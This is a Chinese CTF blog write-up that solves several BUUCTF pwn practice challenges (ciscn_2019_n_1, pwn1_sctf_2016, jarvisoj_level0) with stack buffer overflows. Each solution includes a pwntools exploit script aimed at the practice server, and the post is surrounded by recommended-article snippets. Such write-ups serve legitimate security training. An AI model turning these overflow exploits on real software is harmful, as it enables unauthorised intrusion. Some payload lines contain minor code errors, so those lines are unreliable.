buuctf-pwn刷题(二)

最新推荐文章于 2023-07-19 15:54:27 发布
最新推荐文章于 2023-07-19 15:54:27 发布
阅读量2k 收藏 1
点赞数
分类专栏: pwn 文章标签: 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/CHAWUCIREN1/article/details/119004492
版权

ciscn_2019_n_1

直接运行一波
在这里插入图片描述
猜数字的
checksec file一下

在这里插入图片描述
放入ida
发现func函数里面有 东西
在这里插入图片描述
这个是一道溢出题,我们输入的数字给v1,但是在进行判断的时候,用的是v2,我们需要溢出v2,使其等于目标值
查看一下栈空间
在这里插入图片描述
我们发现v2在栈上04的位置,也就是(0x30-4)
11.28125转化为十六进制为0x41348000
这里有个骚操作
在这里插入图片描述
发现这个是直接对比,所以就直接看到16进制,就不用在转化了、
pay load= b’A’*(0x30-4) + p64(0x41348000)

from pwn import *
payload =  b'A'*(0x30-4) + p64(0x41348000)
#p = process('./ciscn_2019_n_1')
p = remote('node4.buuoj.cn',26032)
p.sendline(payload)
p.interactive()

pwn1_sctf_2016

执行一下
在这里插入图片描述
似乎出现第一个i被替换成you
检查一下保护机制
在这里插入图片描述
丢到ida里面
在这里插入图片描述

输入的变量s大小为0x3c,但是我们看fgets里面,我们只能输入32个字符,没法进行溢出,
我们在输入的时候,会发现i会被替换成you,所以我们可以利用20个i来填充,

找到shell,地址为0x8048F0D
在这里插入图片描述
在这里插入图片描述
返回地址再随便填四个字符

我们可以构造一下payload
payload = ‘I’*20 + p64(0x8048F0D)

exp

from pwn import *
p = process('./pwn1_sctf_2016')
payload = 'I'*20 +'A'*4+ p64(0x8048F0D)
p.send(payload)
p.interactive()

jarvisoj_level0

先运行一下
在这里插入图片描述
多输入一些字符,发现会报错
在这里插入图片描述
F5查看伪代码
在这里插入图片描述
查看vnlerable_function函数
在这里插入图片描述
可以发现buf里面是128,但是可以输入0x200,
我们查看一下buf的栈空间
在这里插入图片描述
在callsystem函数处找到函数shell地址
在这里插入图片描述
在这里插入图片描述

payload = ‘A’*(0x80+8) + p64(0x400596)

from pwn import *
#p = process('./jarvisoj_level0')
p = remote('node4.buuoj.cn',29054)
payload = 'A'*(0x80+8) +	p64(0x400596)
p.sendline(payload)
p.interactive()

ciscn_2019_c_1

先执行一下
在这里插入图片描述
Encryption 加密
看一下主函数的伪代码
在这里插入图片描述

续梦人
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
【4】简单的代码实现
weixin_43741616的博客
03-29 264
1.完成猜数字游戏。 #define _CRT_SECURE_NO_WARNINGS #include<stdio.h> #include<stdlib.h> #include<time.h> void menu() { printf("**************************\n"); printf("********* 1.PALY ****...
练习
scacacac的博客
11-28 181
猜数字游戏:https://github.com/jiangjunguo-web/c-learning/blob/master/Test_1124/Test_1124/Test_1124.c 三子棋游戏:https://github.com/jiangjunguo-web/c-learning/blob/master/Test_1123/Test_1123/Test_1123.c 课程的练习:ht...
CTF
weixin_56817426的博客
04-12 1005
文章目录CTF一、十进制转36进制做题步骤、a1z26做题步骤三、4进制做题步骤总结 CTF 提示:这里可以添加本文要记录的大概内容: 例如:随着人工智能的不断发展,很多人都开启了学习机器学习,本文就介绍了机器学习的基础内容。 提示:以下是本篇文章正文内容,下面案例可供参考 一、十进制转36进制 做题步骤 要先导入base36的数据包,否则无法运行。 代码: import base36 num=597142166468670232704404065453992639482284357949191.
分法例题:猜数字
lzm123456的博客
11-06 480
package Group1; //374. 猜数字大小 class GuessGame { private static final int NUM = 6; int guess(int num) { if (num == NUM) { return 0; } else if (num < NUM) { return -1; } return 1; } }
CTF-密码学-a1z26
louhuanbin的博客
04-12 818
题目:游戏里面好像藏了东西 猜数字: import random secher = random.randint(1,20) print("--------猜数字游戏----------") temp = input(“开始游戏:”) guess = int(temp) while guess != secher: temp = input(“不对不对,继续:”) guess = int(temp) if guess == secher: print(“你真棒!”) else: if guess >
BUUCTF-PWN-[ZJCTF 2019]Login
07-10
BUUCTF-PWN-[ZJCTF 2019]Login
mqtt-pwn:MQTT-PWN打算成为IoT Broker渗透测试和安全评估操作的一站式服务
05-02
MQTT-PWN MQTT是一种机器对机器的连接协议,被设计为一种极其轻量级的发布/订阅消息传递,并已被全球数百万个IoT设备广泛使用。 MQTT-PWN打算成为IoT Broker渗透测试和安全评估操作的一站式商店,因为它结合了枚举...
Wi-PWN_8.0_ENGLISH.bin
08-25
ESP8266的WIFI杀手固件,这是不带显示的。 我后续更新带OLED显示的固件。教程后将更新。
Wi-PWN_8.0_ENGLISH_OLED.bin
08-25
这是ESP8266的带OLED显示的WIFI杀手固件。
CSAWCTF-2018-pwn-shellcode|CSAWCTF-2018-pwn-shellcode
12-10
CSAWCTF 2018年pwn题 shellcode 变形shellcode练手题目,该题目主要是利用三个节点来注入shellcode,考验解题人对shellcode的熟悉程度。题解:https://blog.csdn.net/A951860555/article/details/110350773
猜数字大小
waqxy的专栏
11-29 673
//Copyright (c) 2014软件技术1班 // All rights reserved. // 作 者:A37 // 完成日期:2014年 11 月 26 日 // 版 本 号:v1.0 // // 问题描述:随机产生一个1~100随机数,要求输入的数与随机数比较。 // 输入描述:1个实数。 // 程序输出:是否猜中随机数。 using Syste
【PicoCTF】guess number 1
weixin_51055545的博客
04-16 349
例行检查: 分析 64位程序,一道静态编译的题目,ida中分析: 主要要绕过的函数为do_stuff(),双击进去查看: 我们这要猜对数字,就会返回v5=1,然后就会在主函数执行win()函数,win()函数中存在栈溢出: 大小为0x168,思路就很清晰了,接下来就开始exp的编写, exp分析: 猜数字直接调试就可以看到是0x54,也就是84 刚开始我就直接用: root@ubuntu:/home/giantbranch/Desktop/pico# ROPgadget --binary vuln
CTF-Show密码学【Base64、栅栏密码、16进制】
qq_22841387的博客
06-22 1976
本题通过提供一个密文和工具下载链接的方式,引导我们进行密文解密和栅栏密码解密的操作。在解题过程中,我们采取了以下步骤:1.分析密文特征:通过观察密文的特征,我们确定了它是16进制密文。2.转换为文本形式:使用在线的16进制转文本工具,将密文转换为文本形式。3.Base64解密:观察转换后的文本特征,我们猜测它可能是经过Base64加密的,因此进行了解密操作。4.栅栏密码解密:使用下载的工具中的栅栏密码加解密工具,尝试不同的栏数进行解密。5.提交flag。
CTF题库>压缩的问题 (一段16进制字符串,乌鸦~~~~~~)
qq_42777804的博客
08-15 1953
打开网站链接之后发现 其实这道题已经提示了太多太多了 1.winrar 压缩密码为 65h-71h 2.解压后的txt文件的sha1值 的前八位 3.我们可以知道 需要一个压缩文件 正好又给我们一串十六进制的字符串 所以我们先把这一串16进制字符串导入到 十六进制编译器里面 (winhex UE 都可以 这了我用的时 010editor) 有些人不会导入字符串 按我这个步骤准没有错 1.先建立...
pwn-随机计算题类型
IT_huanhuan的博客
05-25 1052
沙盒机制也就是我们常说的沙箱,英文名sandbox,是计算机领域的虚拟技术,常见于安全方向。一般说来,我们会将不受信任的软件放在沙箱中运行,一旦该软件有恶意行为,则禁止该程序的进一步运行,不会对真实系统造成任何危害。在ctf比赛中,pwn题中的沙盒一般都会限制execve的系统调用,这样一来one_gadget和system调用都不好使,**只能采取open/read/write的组合方式来读取flag。
BUU pwn 刷题
qq_36495104的博客
05-19 1456
这里基本都是栈溢出题,没什么技术含量,只作为记录 [第五空间2019 决赛]PWN5 查看保护 开启了canary和栈不可执行保护 IDA反编译得到main函数 int __cdecl main(int a1) { unsigned int v1; // eax int fd; // ST14_4 int result; // eax char nptr; // [esp+4h] [ebp-80h] char buf; // [esp+14h] [ebp-70h] unsigned
Pwn buuctf题解心得
xiaolei0413的博客
07-19 124
可以看到刚刚输入的字符串对应两个地址 ,左边的d094存放的是字符串真正的地址,就是d0b8存放着字符串。按道理printf第一个参数应该就是d094了,但是前面还出现了一次这个函数,所以真正的第一个参数地址应该是d090.至于为什么是输入4,刚好%n前输入了一个地址就是四个字节的,那么对应d0b8中的地址就会被赋值为4.然后0x0804C044就是。这样就是指定修改d0b8的值了。的值,现在就是把printf第一个参数,也就是找输入的字符串会保存在哪个位置。,一个很明显的格式化字符串漏洞。
[BUUCTF]Pwn刷题记录
x0r
10-13 198
本部分内容长期更新,不再创建新文章影响阅读 rip 根据IDA加载入main函数声明发现s数组距离rbp的距离为F,即为15,这里的运行环境是64位,所以应当将Caller's rbp的数据填满,在这里是8位,即可构造payload from pwn import * p=remote("node4.buuoj.cn", 25401) #p=process("./pwn1") payload=b...
buuctf习题pwn(2~10)
yw__y的博客
03-30 869
mqtt-pwn安装
最新发布
09-20
安装mqtt-pwn的步骤如下: 1. 克隆mqtt-pwn仓库:使用命令`git clone https://github.com/akamai-threat-research/mqtt-pwn.git`将mqtt-pwn仓库克隆到本地。 2. 进入mqtt-pwn目录:使用命令`cd mqtt-pwn`进入mqtt-pwn所在的目录。 3. 启动mqtt-pwn容器:使用命令`sudo docker-compose up --build --detach`启动mqtt-pwn容器。 另外,您还需要安装以下软件: 1. 安装pwntools:使用命令`python3 -m pip install --upgrade pwntools`来安装并更新pwntools。 2. 安装mosquitto程序和mosquitto-clients客户端程序:使用命令`sudo apt install mosquitto`和`sudo apt install mosquitto-clients`来安装mosquitto程序和mosquitto-clients客户端程序。 请注意,以上步骤假设您已经在Linux环境下进行操作。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值